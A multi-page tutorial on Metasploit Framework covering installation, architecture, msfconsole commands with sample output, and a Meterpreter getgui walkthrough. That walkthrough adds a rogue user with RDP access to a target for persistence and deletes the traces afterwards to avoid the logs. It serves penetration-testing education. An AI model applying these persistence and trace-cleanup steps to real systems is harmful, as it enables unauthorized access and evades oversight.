This is the multi-page printable view of this section. Click here to print.
Metasploit Framework is a powerful open source tool for penetration testing, exploit development, and vulnerability research. It is the most widely used penetration testing framework in the world. Metasploit Framework is a collection of tools, libraries, and documentation that makes it easy to develop, test, and execute exploits against a target system. It is written in Ruby and is available for Windows, Linux, and OS X.
When you open a shell with Meterpreter in Metasploit Framework, one of the operations that can be done is to implement a remote desktop connection. The getgui command is very useful for this.
In this article, we will see how we can create a user in the system using the getgui command and then connect to this computer with the rdesktop command.
We assume that you have opened the Meterpreter shell on the target computer. Now we need the username and password required to establish a visual connection using the getgui command. When you create such a username and password, you will have ensured permanence.
First, let’s look at the getgui help titles.
meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u -p
Or: getgui -e
OPTIONS:
-e Enable RDP only.
-f Forward RDP Connection.
-h Help menu.
-l The language switch
Possible Options: 'de_DE', 'en_EN' / default is: 'en_EN'
-p The Password of the user
Generally, -u is used to specify the username, -p the password. When you use the getgui command in a similar way to the example below, you add a new user to the system.
meterpreter > run getgui -u loneferret -p password
> Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
> Carlos Perez carlos_perez@darkoperator.com
> Language detection started
> Language detected: en_US
> Setting user account for logon
> Adding User: loneferret with Password: password
> Adding User: loneferret to local group ''
> Adding User: loneferret to local group ''
> You can now login with the created user
> For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc
meterpreter >
Now the user is created. You can connect to the remote desktop using this username and password from another computer on the same network.
root@kali:~#: rdesktop -u loneferret -p password 192.168.101.108
The more you play around with the target system, the more likely you are to be recorded in the log records. For this reason, you should avoid unauthorized actions as much as possible or be content with intervening where necessary.
You may want to clean the log records of the user and session information you created with getgui. The following command example will be useful for this. You can check the most up-to-date version of the /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc file used in the example from the same folder.
meterpreter > run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20110112.2448.rc
> Running Command List ...
> Running command execute -H -f cmd.exe -a "/c net user hacker /delete"
Process 288 created.
meterpreter >
Metasploit Framework is a software used in penetration testing and security testing. The Pro version of the software developed by Rapid7 is distributed for a fee and has visual interface support.
Metasploit Framework comes installed in Kali etc. distributions. Even if you do not use Kali, you can install it on your own Linux distribution. In this article, we will examine how to install the free version, which is the Community version and works from the command line. It is estimated that the commands used in the explanation will work on all Ubuntu-based distributions. We performed our tests and trials on Linux Mint 18.1 Cinnamon Linux distribution.
Linux will be updated and restarted with the following commands.
sudo apt-get update && sudo apt-get dist-upgrade -y
reboot
The following installation script codes provided by Rapid7 will do all the necessary operations.
The following command should be run with root permissions.
cd
sudo su
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
chmod 755 msfinstall && \
./msfinstall
When the process starts, the screen will continue as follows.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 5394 100 5394 0 0 9248 0 --:--:-- --:--:-- --:--:-- 9252
Updating package cache..OK
Checking **for **and installing update..
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
metasploit-framework
0 upgraded, 1 newly installed, 0 to remove and 1 not upgraded.
Need to get 176 MB of archives.
After this operation, 431 MB of additional disk space will be used.
Get:1 <a href="http://downloads.metasploit.com/data/...[176">http://downloads.metasploit.com/data/...[176</a> MB]
The above command will add the Rapid7 APT Repository to the system and install the necessary packages.
After the installation, return from root privileges to normal user privileges with the exit command. The # sign in the command line should change to $.
umut-X550JX umut # exit
umut@umut-X550JX ~ $
Run the msfconsole command in the command line and create a database: Answer yes to the question Would you like to use and setup a new database (recommended)?
user@mint ~ $ msfconsole
****** Welcome to Metasploit Framework Initial Setup ******
Please answer a few questions to get started.
Would you like to use and setup a new database **(**recommended**)**? yes
Creating database at /home/user/.msf4/db
Starting database at /home/user/.msf4/db
Creating database users
Creating initial database schema
****** Metasploit Framework Initial Setup Complete ******
If things went well (which I’m sure they will), you will be greeted with a screen similar to the example below.
, ,
/ \
**((**__---,,,---__**))**
**(**_**)** O O **(**_**)**_________
\ _ / |\
o_o \ M S F | \
\ _____ | *****
**||**| WW|||
**||**| **||**|
**=[** metasploit v4.14.17-dev- **]**
+ -- --**=[** 1647 exploits - 945 auxiliary - 291 post **]**
+ -- --**=[** 486 payloads - 40 encoders - 9 nops **]**
+ -- --**=[** Free Metasploit Pro trial: <a href="http://r-7.co/trymsp">http://r-7.co/trymsp</a> **]**
msf >
You can check the database connection with the msfdb status command.
msf > msfdb status
> exec: msfdb status
Database started at /home/umut/.msf4/db
msf >
The database will create the exploit index in a few minutes. Then you will be able to search for exploits faster with the search command.
For example, if you are looking for an exploit related to samba, the following search samba command may be useful.
msf > search samba
Matching Modules
**================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow
auxiliary/scanner/rsync/modules_list normal List Rsync Modules
auxiliary/scanner/smb/smb_uninit_cred normal Samba _netr_ServerPasswordSet Uninitialized Credential State
exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow **(*******BSD x86**)**
exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption **(**Linux x86**)**
exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow
exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow **(**Linux x86**)**
exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow **(**Mac OS X PPC**)**
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow **(**Solaris SPARC**)**
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution
exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent MS14-060 Microsoft Windows OLE Package Manager Code Execution
exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow
exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow
exploit/windows/smb/group_policy_startup 2015-01-26 manual Group Policy Script Execution From Shared Resource
post/linux/gather/enum_configs normal Linux Gather Configurations
Metasploit Framework is updated very frequently. Since the package repository is added to your system, it can be updated with apt update or from within msfconsole You can update it with the msfupdate command.
I wanted to take a look at the basic information and commands you may need to use the Metasploit Framework effectively and at full capacity. Instead of rushing and going fast, let’s first see the basic information that will make our job easier.
Metasploit consists of the elements briefly shown in the architecture diagram you see above. Let’s briefly introduce these basic elements
It is the most basic starting library for Metasploit. It is the center where socket, protocol, SSL, SMB, HTTP, XOR, Base64, Unicode operations are performed.
The Core layer, built on the Rex library, is the part where settings that allow external modules and plugins to be added are managed. It provides the basic API. This is the Framework we call the Framework.
This layer is the part where the basic APIs are simplified even more.
This is the part that the user sees. The parts where the interface and commands are entered are located here.
The MSF file system is designed to make the user’s job easier and the folders are meaningful. If you are going to use a program, knowing the file system and what is in which folder is very important for the beginning. If you have installed the Metasploit Framework software on your Linux operating system via your distribution’s software center, you can find the necessary folders in /usr/share. If you downloaded and installed it as a Debian package, you can find it in the /opt/metasploit-framework/ folder.
Let’s see what information some of the main folders contain.
data: Files used and modified by Metasploit are in this folder.
documentation: Help and explanation documents about MSF are in this folder.
external: Source codes and 3rd party libraries are in this folder.
lib: Main libraries used by MSF are in this folder.
modules: Modules in the index when MSF is loaded are in this folder.
plugins: Plugins to be loaded when the program starts are here.
scripts: Meterpreter and other script codes are in this folder.
tools: There are various command line tools.
Metasploit Framework is made up of modules. What are these modules in short?
Payload: Script codes designed to work on the opposite system are called Payload.
Exploits: Modules that use Payload are called exploits.
Auxiliary: Modules that do not use Payload are called Auxiliary modules.
Encoders: Modules that ensure that Payload scripts are sent to the opposite party and are delivered.
Nops: Modules that ensure that Payload scripts work continuously and healthily.
Let’s look at the folder where the modules, which we can divide into two as basic modules and user modules, are located.
The modules that are installed and ready every time MSF is loaded are located in the /usr/share/metasploit-framework/modules/ folder we mentioned above or in /opt/metasploit-framework/modules/. Windows users can also look in the Program Files folder.
The greatest opportunity Metasploit provides to the user is the ability to include their own modules in the framework. You have written or downloaded a script that you want to use. These codes are called user modules and are kept in a hidden folder with a dot at the beginning in the user’s home folder. Its exact address is ~/.msf4/modules/. ~ means home folder. You can activate the “Show Hidden Files” option to see the folder in the file manager.
MSF offers the user the opportunity to load their own additional modules when starting or after starting. Let’s see how this is done when starting and after starting.
In both methods explained below, the folder addresses you will give to the commands must contain folders that comply with the msf naming convention. For example, if you want to load an exploit from the ~/.msf4/modules/ folder, that exploit must be in the ~/.msf4/modules/exploit/ folder.
You can learn the exact names of the folders and the naming template from the folder your program is installed in. The sample output for my computer is in the folder structure below.
umut@umut-X550JX /opt/metasploit-framework/embedded/framework/modules $ ls -l
total 24
drwxr-xr-x 20 root root 4096 May 10 14:46 auxiliary
drwxr-xr-x 11 root root 4096 May 10 14:46 encoders
drwxr-xr-x 19 root root 4096 May 10 14:46 exploits
drwxr-xr-x 10 root root 4096 May 10 14:46 nops
drwxr-xr-x 5 root root 4096 May 10 14:46 payloads
drwxr-xr-x 12 root root 4096 May 10 14:46 post
As we mentioned above, user modules were in the ~/.msf4/modules/ folder. When we tell this folder to the msfconsole command, additional modules are loaded and the system starts like that. We can do this with the -m parameter as seen in the command below.
umut@umut-X550JX ~ $ msfconsole -m ~/.msf4/modules/
Found a database at /home/umut/.msf4/db, checking to see **if **it is started
Starting database at /home/umut/.msf4/db...success
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Press SPACE BAR to **continue**
**=[** metasploit v4.14.17-dev- **]**
+ -- --**=[** 1648 exploits - 946 auxiliary - 291 post **]**
+ -- --**=[** 486 payloads - 40 encoders - 9 nops **]**
+ -- --**=[** Free Metasploit Pro trial: <a href="http://r-7.co/trymsp">http://r-7.co/trymsp</a> **]**
msf >
You started the MSF program with the msfconsole command and some of your operations are ongoing. You do not need to close the program to introduce a new module to the system. With the loadpath command, the module Once you tell it the path it is in, the installation will take place.
msf > loadpath /home/umut/.msf4/modules
Loaded 0 modules:
msf >
In this article, we will examine the basic commands used in the Metasploit Framework. You may think that the commands are too many and complicated at first, but I recommend that you give yourself time. You will become familiar with them as you use them and you will start typing them automatically. When writing commands, you can type a few letters of the command and complete the rest automatically with the TAB key. Command and folder path completion in msfconsole works exactly like in the Linux command line.
When you activate a module you have selected using the use command, you can stop using the module. In this case, when you want to go back to a higher folder, the back command is used. Technically, it is not very necessary because when you select a new module in the module you are in, you exit that module.
msf auxiliary**(**ms09_001_write**)** > back
msf >
Displays a randomly selected banner.
msf > banner
_ _
/ / __ _ __ /_/ __
| | / | _____ ___ _____ | | / _
| | /| | | ___ |- -| / / __ | -__/ | **||** | **||** | |- -|
|_| | | | _|__ | |_ / - __ | | | | __/| | | |_
|/ |____/ ___/ / \___/ / __| |_ ___
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- type 'go_pro' to launch it now.
**=[** metasploit v4.11.4-2015071402 **]**
+ -- --**=[** 1467 exploits - 840 auxiliary - 232 post **]**
+ -- --**=[** 432 payloads - 37 encoders - 8 nops **]**
Although not every exploit supports this command, let’s explain what it does. You have chosen a module and are wondering if it will work on the target system before applying it. After making the necessary settings with the set command, you can do a preliminary test with the check command.
msf exploit**(**ms08_067_netapi**)** > show options
Module options **(**exploit/windows/smb/ms08_067_netapi**)**:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.194.134 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use **(**BROWSER, SRVSVC**)**
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit**(**ms08_067_netapi**)** > check
> Verifying vulnerable status... **(**path: 0x0000005a**)**
> System is not vulnerable **(**status: 0x00000000**)**
> The target is not exploitable.
msf exploit**(**ms08_067_netapi**)** >
It allows you to color the output and information you receive from msfconsole.
msf > color
Usage: color >'true'|'false'|'auto'>
Enable or disable color output.
We can say that it is a small telnet or netcat program. It has SSL support and you can do file sending etc. To use it, you can reach the remote computer from msfconsole if you specify the IP address and port number you want to connect to.
msf > connect 192.168.1.1 23
> Connected to 192.168.1.1:23
DD-WRT v24 std **(**c**)** 2008 NewMedia-NET GmbH
Release: 07/27/08 **(**SVN revision: 10011**)**
DD-WRT login:
You can see detailed options for the connect command with the -h parameter.
msf > connect -h
Usage: connect **[**options]
Communicate with a host, similar to interacting via netcat, taking advantage of any configured session pivoting.
OPTIONS:
-C Try to use CRLF **for **EOL sequence.
-P <opt> Specify source port.
-S <opt> Specify source address.
-c <opt> Specify which Comm to use.
-h Help banner.
-i <opt> Send the contents of a file.
-p <opt> List of proxies to use.
-s Connect with SSL.
-u Switch to a UDP socket.
-w <opt> Specify connect timeout.
-z Just try to connect, **then return**.
msf >
If you want to make changes to the code of the actively selected module, you can open the text editor with the edit command and perform the necessary operations. The Vim editor will open by default.
msf exploit**(**ms10_061_spoolss**)** > edit
> Launching /usr/bin/vim /usr/share/metasploit-framework/modules/exploits/windows/smb/ms10_061_spoolss.rb
require 'msf/core'
require 'msf/windows_error'
class Metasploit3 > Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
def initialize(info = {})
Used to exit msfconsole.
msf exploit**(**ms10_061_spoolss**)** > exit
root@kali:~#
It is used to display a list of available commands and their brief descriptions on the screen.
msf > help
Core Commands
**=============**
Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
...snip...
Database Backend Commands
**=========================**
Command Description
------- -----------
creds List all credentials **in **the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file **(**filetype will be auto-detected**)**
...snip...
You can examine detailed information about any module you want with the info command. Before using any module, we recommend that you read the module details with the info command. You may not be successful just by looking at its name.
msf exploit(ms09_050_smb2_negotiate_func_index) > info exploit/windows/smb/ms09_050_smb2_negotiate_func_index
Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Module: exploit/windows/smb/ms09_050_smb2_negotiate_func_index
Version: 14774
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Good
Provided by:
Laurent Gaffie <laurent.gaffie@gmail.com>
hdm <hdm@metasploit.com>
sf <stephen_fewer@harmonysecurity.com>
Available targets:
Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait **for **the attack to complete.
Payload information:
Space: 1024
Description:
This module exploits an out of bounds **function **table dereference **in
**the SMB request validation code of the SRV2.SYS driver included with
Windows Vista, Windows 7 release candidates **(**not RTM**)**, and Windows
2008 Server prior to R2. Windows Vista without SP1 does not seem
affected by this flaw.
References:
<a href="http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx">http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx</a>
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name">http://cve.mitre.org/cgi-bin/cvename.cgi?name</a>**=**2009-3103
<a href="http://www.securityfocus.com/bid/36299">http://www.securityfocus.com/bid/36299</a>
<a href="http://www.osvdb.org/57799">http://www.osvdb.org/57799</a>
<a href="http://seclists.org/fulldisclosure/2009/Sep/0039.html">http://seclists.org/fulldisclosure/2009/Sep/0039.html</a>
<a href="http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx">http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx</a>
msf exploit**(**ms09_050_smb2_negotiate_func_index**)** >
When you issue this command, you go directly to the Ruby script operator. It allows you to write scripts with Ruby from within msfconsole.
msf > irb
> Starting IRB shell...
**>>** puts "Hello, metasploit!"
Hello, metasploit!
**=>** nil
**>>** Framework::Version
**=>** "4.8.2-2014022601"
It allows you to list the modules running in the background, shutdown, etc.
msf > jobs -h
Usage: jobs **[**options]
Active job manipulation and interaction.
OPTIONS:
-K Terminate all running jobs.
-h Help banner.
-i <opt> Lists detailed information about a running job.
-k <opt> Terminate the specified job name.
-l List all running jobs.
-v Print more detailed info. Use with -i and -l
msf >
If you give the job id number of a running process, it will cause the process to be closed.
msf exploit**(**ms10_002_aurora**)** > kill 0
Stopping job: 0...
> Server stopped.
Allows you to load plugins from Metasploit folders. Parameters must be specified in key=val format.
msf > load
Usage: load <path> [var=val var=val ...]
If you do not give the full path of the plugin with the load command, the user folders ~/.msf4/plugins are first checked. If it is not found there, the metasploit-framework main folders /usr/share/metasploit-framework/plugins are checked for the plugin.
msf > load pcap_log
> PcapLog plugin loaded.
> Successfully loaded plugin: pcap_log
Allows you to load a module of your choice while msfconsole is running.
msf > loadpath /home/secret/modules
Loaded 0 modules.
It ensures that the plugin you loaded with the load command is separated from the system.
msf > unload pcap_log
Unloading plugin pcap_log...unloaded.
Some modules reference external resources from within script commands. For example, you can use the resource command to use resources (password dictionary) etc. in msfconsole.
msf > resource
Usage: resource path1 **[**path2 ...]
msf > resource karma.rc
> Processing karma.rc for ERB directives.
resource (karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook
resource (karma.rc_.txt)>use auxiliary/server/browser_autopwn
...snip...
These types of resource files can speed up your work considerably. You can use the -r parameter to send a msfconsole resource file from outside msfconsole.
root@kali:~# echo version > version.rc
root@kali:~# msfconsole -r version.rc
_ _
/ / __ _ __ /_/ __
| | / | _____ ___ _____ | | / _
| | /| | | ___ |- -| / / __ | -__/ | **||** | **||** | |- -|
|_| | | | _|__ | |_ / - __ | | | | __/| | | |_
|/ |____/ ___/ / \___/ / __| |_ ___
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- type 'go_pro' to launch it now.
**=[** metasploit v4.8.2-2014021901 **[**core:4.8 api:1.0] **]**
+ -- --**=[** 1265 exploits - 695 auxiliary - 202 post **]**
+ -- --**=[** 330 payloads - 32 encoders - 8 nops **]**
> Processing version.rc **for **ERB directives.
resource **(**version.rc**)>** version
Framework: 4.8.2-2014022601
Console : 4.8.2-2014022601.15168
msf >
The route command is used to change the route of communication on the target computer. It has add, delete and list options. You need to send the subnet, netmask, gateway parameters to the command.
meterpreter > route -h
Usage: route **[**-h**]** command **[**args]
When you open a meterpreter session on the target computer, you can see the current communication table if you give the route command without parameters.
Supported commands:
add **[**subnet] **[**netmask] **[**gateway]
delete **[**subnet] **[**netmask] **[**gateway]
list
meterpreter >
meterpreter > route
Network routes
**==============**
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 172.16.1.254
127.0.0.0 255.0.0.0 127.0.0.1
172.16.1.0 255.255.255.0 172.16.1.100
172.16.1.100 255.255.255.255 127.0.0.1
172.16.255.255 255.255.255.255 172.16.1.100
224.0.0.0 240.0.0.0 172.16.1.100
255.255.255.255 255.255.255.255 172.16.1.100
It allows you to search within msfconsole. You can simply type any phrase you are looking for, or you can narrow down your search using parameters.
msf > search usermap_script
Matching Modules
**================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
msf >
We can diversify your searches by using keywords.
msf > help search
Usage: search **[**keywords]
Keywords:
name : Modules with a matching descriptive name
path : Modules with a matching path or reference name
platform : Modules affecting this platform
type : Modules of a specific type **(**exploit, auxiliary, or post**)**
app : Modules that are client or server attacks
author : Modules written by this author
cve : Modules with a matching CVE ID
bid : Modules with a matching Bugtraq ID
osvdb : Modules with a matching OSVDB ID
msf >
Search with keyword “name”.
msf > search name:mysql
Matching Modules
**================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/mysql/mysql_enum normal MySQL Enumeration Module
auxiliary/admin/mysql/mysql_sql normal MySQL SQL Generic Query
auxiliary/analyze/jtr_mysql_fast normal John the Ripper MySQL Password Cracker (Fast Mode)
auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal MySQL Authentication Bypass Password Dump
auxiliary/scanner/mysql/mysql_hashdump normal MYSQL Password Hashdump
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
auxiliary/scanner/mysql/mysql_schemadump normal MYSQL Schema Dump
auxiliary/scanner/mysql/mysql_version normal MySQL Server Version Enumeration
exploit/linux/mysql/mysql_yassl_getname 2010-01-25 good MySQL yaSSL CertDecoder::GetName Buffer Overflow
exploit/linux/mysql/mysql_yassl_hello 2008-01-04 good MySQL yaSSL SSL Hello Message Buffer Overflow
exploit/windows/mysql/mysql_payload 2009-01-16 excellent Oracle MySQL **for **Microsoft Windows Payload Execution
exploit/windows/mysql/mysql_yassl_hello 2008-01-04 average MySQL yaSSL SSL Hello Message Buffer Overflow
msf >
Searching module folders with the keyword “path”.
msf > search path:scada
Matching Modules
**================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/scada/igss_exec_17 2011-03-21 normal Interactive Graphical SCADA System Remote Command Injection
exploit/windows/scada/citect_scada_odbc 2008-06-11 normal CitectSCADA/CitectFacilities ODBC Buffer Overflow
...snip...
Search with keyword “platform”
msf > search platform:aix
Matching Modules
**================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
payload/aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
payload/aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
payload/aix/ppc/shell_interact normal AIX execve shell **for **inetd
...snip...
Search with keyword “type”
msf > search type:exploit
Matching Modules
**================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection
post/linux/gather/enum_cron normal Linux Cron Job Enumeration
post/linux/gather/enum_linux normal Linux Gather System Information
...snip...
Search by author with the keyword “author”.
msf > search author:dookie
Matching Modules
**================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/osx/http/evocam_webserver 2010-06-01 average MacOS X EvoCam HTTP GET Buffer Overflow
exploit/osx/misc/ufo_ai 2009-10-28 average UFO: Alien Invasion IRC Client Buffer Overflow Exploit
exploit/windows/browser/amaya_bdo 2009-01-28 normal Amaya Browser v11.0 bdo tag overflow
...snip...
You can search by entering more than one keyword criteria.
msf > search cve:2011 author:jduck platform:linux
Matching Modules
**================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/linux/misc/netsupport_manager_agent 2011-01-08 average NetSupport Manager Agent Remote Buffer Overflow
You can manage sessions with the sessions command. Sessions are processes that organize the currently active activities of each module you use.
msf > sessions -h
Usage: sessions [options]
Active session manipulation and interaction.
OPTIONS:
-K Terminate all sessions
-c <opt> Run a command on the session given with -i, or all
-d <opt> Detach an interactive session
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate session
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s <opt> Run a script on the session given with -i, or all
-u <opt> Upgrade a win32 shell to a meterpreter session
-v List verbose fields
You can use the -l parameter to see the list of all currently existing sessions.
msf exploit**(**3proxy**)** > sessions -l
Active sessions
**===============**
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.101:33191 -> 192.168.1.104:4444
To interact with a given session, you just need to use the ‘-i’ switch followed by the Id number of the session.
msf exploit**(**3proxy**)** > sessions -i 1
> Starting interaction with 1...
C:WINDOWSsystem32>
The set command is used to edit the options and parameters that need to be set for the module you have selected and activated with the use command.
msf auxiliary**(**ms09_050_smb2_negotiate_func_index**)** > set RHOST 172.16.194.134
RHOST **=>** 172.16.194.134
msf auxiliary**(**ms09_050_smb2_negotiate_func_index**)** > show options
Module options **(**exploit/windows/smb/ms09_050_smb2_negotiate_func_index**)**:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 172.16.194.134 yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait **for **the attack to complete.
Exploit target:
Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 **(**x86**)**
While you can make the necessary adjustments with the set command, you may also want to see the list of encoders that the active module can use.
msf exploit**(**ms09_050_smb2_negotiate_func_index**)** > show encoders
Compatible Encoders
**===================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/none normal The "none" Encoder
x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower manual Avoid UTF8/tolower
x86/call4_dword_xor normal Call+4 Dword XOR Encoder
x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder
x86/context_stat manual stat(2)-based Context Keyed Payload Encoder
x86/context_time manual time(2)-based Context Keyed Payload Encoder
x86/countdown normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
It is the opposite of the set command and cancels the parameter you set in the previous step. You can cancel all the variables you set with the unset all command.
msf > set RHOSTS 192.168.1.0/24
RHOSTS **=>** 192.168.1.0/24
msf > set THREADS 50
THREADS **=>** 50
msf > set
Global
**======**
Name Value
---- -----
RHOSTS 192.168.1.0/24
THREADS 50
msf > unset THREADS
Unsetting THREADS...
msf > unset all
Flushing datastore...
msf > set
Global
**======**
No entries **in **data store.
msf >
You have selected a module and activated it. You will probably set the RHOST variable for that module. You can do this with the set RHOST command, but when you switch to a different module, even if your RHOST value (Target IP) has not changed, the setting you made in the previous module will not be carried over to the new module. Here, the setg command allows you to use a variable setting, active in all modules, without having to set it again and again. Even if you use this setting, we recommend that you check it with the show options command at the end.
msf > setg LHOST 192.168.1.101
LHOST **=>** 192.168.1.101
msf > setg RHOSTS 192.168.1.0/24
RHOSTS **=>** 192.168.1.0/24
msf > setg RHOST 192.168.1.136
RHOST **=>** 192.168.1.136
You have made all the settings and want to exit msfconsole. When you enter again, if you want to use your previous settings again, save them by giving the save command. This way you can save time.
msf > save
Saved configuration to: /root/.msf4/config
msf >
If you use the show command without any parameters, you can see the list of all modules in metasploit.
msf > show
Encoders
**========**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic **${**IFS**}** Substitution Command Encoder
cmd/printf_php_mq manual printf**(**1**)** via PHP magic_quotes Utility Command Encoder
...snip...
You can also use the show command in the following formats.
msf > show auxiliary
Auxiliary
**=========**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability
admin/backupexec/dump normal Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry normal Veritas Backup Exec Server Registry Access
...snip...
msf > show exploits
Exploits
**========**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon **(**rpc.cmsd**)** Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow **(**AIX**)**
bsdi/softcart/mercantec_softcart 2004-08-19 great Mercantec SoftCart CGI Overflow
...snip...
msf > show payloads
Payloads
**========**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
aix/ppc/shell_interact normal AIX execve shell **for **inetd
...snip...
msf exploit**(**ms08_067_netapi**)** > show payloads
Compatible Payloads
**===================**
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
...snip...
The show options command shows the options and variables that can be set for the active module.
msf exploit**(**ms08_067_netapi**)** > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use **(**BROWSER, SRVSVC**)**
Exploit target:
Id Name
-- ----
0 Automatic Targeting
If you are not sure which operating systems can use the module you selected, you can use the show targets command.
